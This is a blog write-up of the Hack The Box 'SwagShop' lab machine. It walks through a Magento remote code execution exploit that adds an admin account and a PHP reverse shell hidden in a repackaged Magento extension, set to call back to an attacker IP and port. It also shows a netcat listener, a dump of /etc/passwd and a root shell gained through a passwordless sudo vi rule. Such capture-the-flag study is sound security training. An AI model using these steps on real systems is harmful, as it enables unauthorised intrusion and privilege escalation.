Navigate back to the homepage

SwagShop Hack The Box Writeup

Bad3r
September 28th, 2019 · 2 min read

This post documents the complete walkthrough of SwagShop, an active vulnerable VM created by ch4p and hosted at Hack The Box

Description
SwagShop is a retired GNU/Linux eCommerce web server using an outdated/unpatched version of Magento with known vulnerabilities and exploits. The Linux system allows the Apache user to run a sudo command with no password required, allowing privilege escalation to root.

❯ Information Gathering

Starting with a Nmap scan

Nmap cheat sheet

1•➜ nmap -sV -sC -oA namp 10.10.10.140
2...
3 └> PORT STATE SERVICE VERSION
4 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
6 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
7 |_http-server-header: Apache/2.4.18 (Ubuntu)
8 |_http-title: Home page Service Info: OS: Linux;

From the SSH flag, we guessed this box to be Ubuntu Xenial and Nmap finds 80/tcp open.

❯ Web Pages Enumeration

Going to http://10.10.10.140 in the browser

htb_swagshop_web.png

we find a Magento shop with some HTB swag available.The pages are copyrighted from 2014, We can see at this page that the last released version in 2014 was 1.9.x.

Browsing around, you will notice that the items are placed under a folder called index.php/ (http://10.10.10.140/index.php/)

by running two GoBuster scans on http://10.10.10.140/ and http://10.10.10.140/index.php/ we find the admin panel at http://10.10.10.140/index.php/admin/

admin_login.png

And http://10.10.10.140/downloader/ to access Magento Connect Manager. You can upload new Magento packages, which contains PHP files inside.

downloader_login.png

❯ Exploitation

We use searchsploit to find exploits in Magneto 1.9.x

searchsploit.png

and we notice a remote code execution exploit

Exploit TitlePath (/usr/share/exploitdb/)
Magento eCommerce - Remote Code Executionexploits/xml/webapps/37977.py

We need to tweak the exploit a little for the odd $IP/index.php/admin requirement instead of $IP/admin

1...
2target = "http://10.10.10.140/"
3
4if not target.startswith("http"):
5 target = "http://" + target
6
7if target.endswith("/"):
8 target = target[:-1]
9
10target_url = target + "/index.php" + "/admin/Cms_Wysiwyg/directive/index/"
11...

we run the script

1• ➜ python 37977.py
2 └> WORKED
3 Check http://10.10.10.140/admin with creds forme:forme

now we can log in to the admin panel http://10.10.10.140/index.php/admin and http://10.10.10.140/downloader with creds forme:forme

❯ Getting a Reverse Shell

Using the Magento Downloader/Magento Connect, we attempt to upload an extension with a PHP reverse shell.

Download any legit Magento package, we’ll use LavaMagentoBD from GitHub/P34C3-07/LavaMagentoBD then extract lavamagento_bd.tgz we’ll have to modify its contents.

1•➜ tar -xzvf lavalamp_magento_bd.tgz

edit the file ./App/code/community/Lavalamp/Connector/controllers/IndexController.php and replace its contents with a PHP reverse shell, we’ll use PHP-Reverse-Shell from Github/pentestmonkey/php-reverse-shell make sure to change the $IP field to your IP address. we will use port 1234

1$ip = '10.10.14.115'; // CHANGE THIS
2$port = 1234;

get the MD5 hash for the file

1• ➜ md5sum ./App/code/community/Lavalamp/Connector/controllers/IndexController.php
2└> 7587816c42712b0c9fe6dccb2c6c5300 IndexController.php

copy it then edit package.xml and replace IndexController.php hash

1<dir name="controllers">
2 <file hash="7587816c42712b0c9fe6dccb2c6c5300"
3 name="IndexController.php"/>
4 </dir>

compress the files back into .tgz file

1•➜ tar -cvzf lavalamp_magento_bd.tgz -c ./*

then upload the file to http://10.10.10.140/downloader/ login with creds forme:forme if the extension is loaded successfully you should see

uploaded.png

start listening using netcat

1•➜ nc -v -n -l -p 1234

then in the browser navigate to http://10.10.10.140/app/code/community/Lavalamp/Connector/controllers/IndexController.php in the terminal you should see that we got a reverse shell

1•➜ nc -nvlp 1234
2└> listening on [any] 1234 ...
3 connect to [<IP>] from (UNKNOWN) [10.10.10.140] 44650
4 Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP x86_64 GNU/Linux
5 13:22:28 up 32 min, 0 users, load average: 4.31, 2.61, 1.86
6 USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
7 uid=33(www-data) gid=33(www-data) groups=33(www-data)
8 /bin/sh: 0: can't access tty; job control turned off

we are connected now with the username www-data, but we still need to spawn a bash shell with tty

1$ python -c 'import pty; pty.spawn("/bin/bash")'

❯ Own User

Now that we have a shell on the box we can view etc/passwd

1•➜ [email protected]:/$ cat /etc/passwd
2└> cat /etc/passwd
3 root:x:0:0:root:/root:/bin/bash
4 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5 bin:x:2:2:bin:/bin:/usr/sbin/nologin
6 sys:x:3:3:sys:/dev:/usr/sbin/nologin
7 sync:x:4:65534:sync:/bin:/bin/sync
8 games:x:5:60:games:/usr/games:/usr/sbin/nologin
9 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
10 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
11 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
12 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
13 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
14 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
15 www-data:x:33:33:www-data:/var/www:/bin/bash
16 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
17 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
18 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
19 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:...
20 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
21 systemd-timesync:x:100:102:systemd Time Synchronization,,,:...
22 systemd-network:x:101:103:systemd Network Management,,,:...
23 systemd-resolve:x:102:104:systemd Resolver,,,:...
24 systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/...
25 syslog:x:104:108::/home/syslog:/bin/false
26 _apt:x:105:65534::/nonexistent:/bin/false
27 lxd:x:106:65534::/var/lib/lxd/:/bin/false
28 mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
29 messagebus:x:108:112::/var/run/dbus:/bin/false
30 uuidd:x:109:113::/run/uuidd:/bin/false
31 dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
32 sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
33 haris:x:1000:1000:haris,,,:/home/haris:/bin/bash

we notice the user haris

1•➜ [email protected]:/$ ls -alh /home/haris
2└> ls -alh /home/haris
3 total 36K
4 drwxr-xr-x 3 haris haris 4.0K May 8 09:21 .
5 drwxr-xr-x 3 root root 4.0K May 2 14:48 ..
6 -rw------- 1 haris haris 54 May 2 14:56 .Xauthority
7 lrwxrwxrwx 1 root root 9 May 8 09:20 .bash_history -> /dev/null
8 -rw-r--r-- 1 haris haris 220 May 2 14:48 .bash_logout
9 -rw-r--r-- 1 haris haris 3.7K May 2 14:48 .bashrc
10 drwx------ 2 haris haris 4.0K May 2 14:49 .cache
11 -rw------- 1 root root 1 May 8 09:20 .mysql_history
12 -rw-r--r-- 1 haris haris 655 May 2 14:48 .profile
13 -rw-r--r-- 1 haris haris 0 May 2 14:49 .sudo_as_admin_successful
14 -rw-r--r-- 1 haris haris 33 May 8 09:01 user.txt

we find user.txt

1•➜ [email protected]:/$ cat /home/haris/user.txt
2└> cat /home/haris/user.txt
3 <user flag>

❯ Privilege Escalation: Own Root

Enumerating the system leads to the finding that sudo -l returns the list of the user’s privileges, and shows that running vi with a specific path /var/www/html/* grants superuser privileges, without a password entry, required

1•➜ [email protected]:/$ sudo -l
2└> sudo -l
3 Matching Defaults entries for www-data on swagshop:
4 env_reset, mail_badpass,
5 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\
6 :/sbin\:/bin\:/snap/bin
7
8 User www-data may run the following commands on swagshop:
9 (root) NOPASSWD: /usr/bin/vi /var/www/html/*

open a file using vi in /var/www/html/*

1•➜ [email protected]:/$ sudo /usr/bin/vi /var/www/html/Bad3r.sh
2└> sudo /usr/bin/vi /var/www/html/Bad3r.sh
3 Vim: Warning: Output is not to a terminal
4 Vim: Warning: Input is not from a terminal
5
6 E558: Terminal entry not found in terminfo
7 ‘unknown’ not known. Available builtin terminals are:
8 builtin_amiga
9 builtin_beos-ansi
10 builtin_ansi
11 builtin_pcansi
12 builtin_win32
13 builtin_vt320
14 builtin_vt52
15 builtin_xterm
16 builtin_iris-ansi
17 builtin_debug
18 builtin_dumb
19 defaulting to ‘ansi’

inside vi you can spawn a root shell

1:!/bin/bash
2~
3~

in the interactive shell, we can get the root flag

1•➜ whoami
2└> root
3•➜ cat /root/root.txt
4 <root flag>
5 ___ ___
6 /| |/|\| |\
7 /_| ´ |.` |_\ We are open! (Almost)
8 | | . | |
9 | --- | --- | --------------------------------- |
10 | | . | Join the beta HTB Swag Store! |
11 | ___ | .__ | https://hackthebox.store/password |
12
13 PS: Use root flag as password!

More articles from SecBytes

Power of Covenant

Deploying Covenant

May 1st, 2019 · 4 min read

Configuring our Machine for Persistence

CLR Hooking for Persistence via Config Files

February 24th, 2020 · 5 min read
© 2019–2020 SecBytes
Link to $https://twitter.com/0xBad3rLink to $https://github.com/Bad3r/